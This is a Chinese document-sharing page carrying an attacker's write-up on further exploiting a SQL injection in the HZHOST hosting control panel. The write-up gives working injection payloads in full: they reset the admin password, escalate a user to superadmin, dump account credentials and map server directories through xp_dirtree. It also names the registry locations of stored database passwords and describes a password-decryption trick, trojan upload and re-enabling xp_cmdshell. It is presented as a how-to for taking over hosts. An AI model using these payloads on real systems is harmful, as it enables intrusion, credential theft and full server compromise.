ImageVerifierCode 换一换
格式:DOCX , 页数:5 ,大小:511.89KB ,
资源ID:7391429      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/7391429.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用.docx)为本站会员(b****6)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用.docx

1、HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用这是一个域名主机实时管理系统。在XX搜索: title: (域名主机实时管理系统) , 会找到大量采用这种系统的网站! 太术语了。就是在线开通ftp.sql.web的一个管理系统。一套web程序。和IIS管理程序。实现在线开通的玩 意。因此: 我们能够免费申请域名和空间! ! 哈哈! ! ! web程序方面写的非常严谨。大量的过滤。由于是商业版的程序, 因此我没有源码。原来是有的, 可是放在家里的电脑上。放暑假时搞的shell现在都被删了。我现在又比较懒, 就没去弄源代码。反正大家知

2、道怎么弄的就行了。这又是一个文本框的注射。我真不知道作者是怎么想的。其它地方都被过滤了。就留下域名管理这里没过滤。官方放暑假的时候就被我搞了一遍, 过了一个月她发现了。删了我的shell。不知道她怎么知道我从那里下的手搞的她。她居然补了漏洞。先上图, 再说下利用方法。123 UPDATE memlst SET u_pss=e10adc3949ba59abbe56e057f20f883e WHERE u_nme=admin-这一句是把用户admin的密码修改为123456。管理员的后台地址一般是或者直接在首页登陆了按切换到管理员后台。如果admin不是超级管理员, 那就有三个办法。一是自己构造语

3、句爆出来。二是提升自己注册的用户的权限。三是直接爆网站路径, 再来个差异备份。第一个方法我给出一条示范语句: 123 and (select top 1 isnull(cast(u_nme as nvarchar(4000),char(32)+char(94)+isnull(cast(U_pss as nvarchar(4000),char(32) from (select top 2u_nme,U_pss from hzhost.memlst where 1=1 order by u_nme) t order by u_nme desc )0- and 1=1能够同时爆出一个用户的帐号和密码

4、。想爆出其它用户的语句自己构造吧。第二个方法是: 123 UPDATE memlst SET u_sys=6 WHERE u_nme=你注册的用户名-123 UPDATE memlst SET u_pwr=2 WHERE u_nme=你注册的用户名-这2句话就能够提升自己为超级管理员第三个方法很麻烦。可是很有效果。直捣黄龙。很强大。我给出如下语句, 大家自己研究去吧! 爆路径语句第一步: 建立表123 ;drop table foofoofoo;create table foofoofoo(id int identity (1,1) not null,name nvarchar (300) n

5、ot null,depth int not null,isfile nvarchar (50) null);- and 1=1第二步: 123 ;declare z nvarchar(4000) set z=0x63003a005c00 insert foofoofoo execute master.xp_dirtree z,1,1- and 1=1注意: 0x63003a005c00 = C: 为sql ENCODE其它的自己找工具去转吧! 第三步: 暴出总数 123 and (select cast(count(*) as varchar(8000)+char(94) from foofo

6、ofoo)0- and 1=1第四步: 暴出你想要的文件夹名字和文件名字 123 and 0(select top 1 cast(isfile as nvarchar(4000)+char(94)+cast(name as nvarchar(4000) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)- and 1=1修改中间红色的1, 依次爆出。至于差异备份语句。让nbsi3告诉你吧。对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用

7、! 我记得还有2篇关于hzhost的漏洞利用文章。名字不记得了。大家去搜索”hzhost漏洞”找找吧! 里面提到下面两点内容! 1。是提到c:windowstemp下有hzhost主机留下的ftp登陆记录。有用户名和密码2。是利用hzhost拿系统主机最高权限的。安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmysqlpassHKEY_LOCAL_MACHINEsoftwarehzhostconfigs

8、ettingsmastersvrpass经过了hzhost自己的加密方式, 象eLVClO4tzsKBf#dee52443a3872cc159这样的字符串。不过在hzhost后台能够还原! 拿到了sa密码, 或者root密码, 最高权限就在眼前! 禁止了w.s的话。大家就传aspx木马导撒! 我们传了一个asp木马上去后。在incsconstr.asp下面能够看到数据库连接串。然后连接到数据库。经过执行SELECT * FROM hstlst语句。能够看到很多主机记录。如图发现什么没有? h_ftppass的密码和hzhost主机自己的加密串很相似。没错, 主机管理的密码也是经过她自己的加密方

9、式加了密! 而我们在主机管理的地方! 看到明文密码。说明她又给还原回来了。明白了么? 我们先经过aspx木马导出mysql, mssql的root,sa密码加密串后。我们经过这条语句, 修改别人的主机密码。UPDATE hstlst SET h_ftppss=aPWw3j4zMaK83lHMBof9fc298b1d3d0a WHERE h_ID=10000471然后回过头去看主机密码。( 这时候被转成了明文) 就拿到了root密码为: sphil_070921注意: 由于有多种限制。我截的图可能不是很完美。可是此方法绝对可行。这方法是看到别人写的利用hzhost取得最高权限得到的启发。谢谢她。我们也能够同样拿到sa密码, 用sa帐号密码远程连接, 直接恢复xp_cmdshell就能够执行系统命令了! 好了。就此结束! 期待牛人写出还原密码程序! ! 这样就不用麻烦了!

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1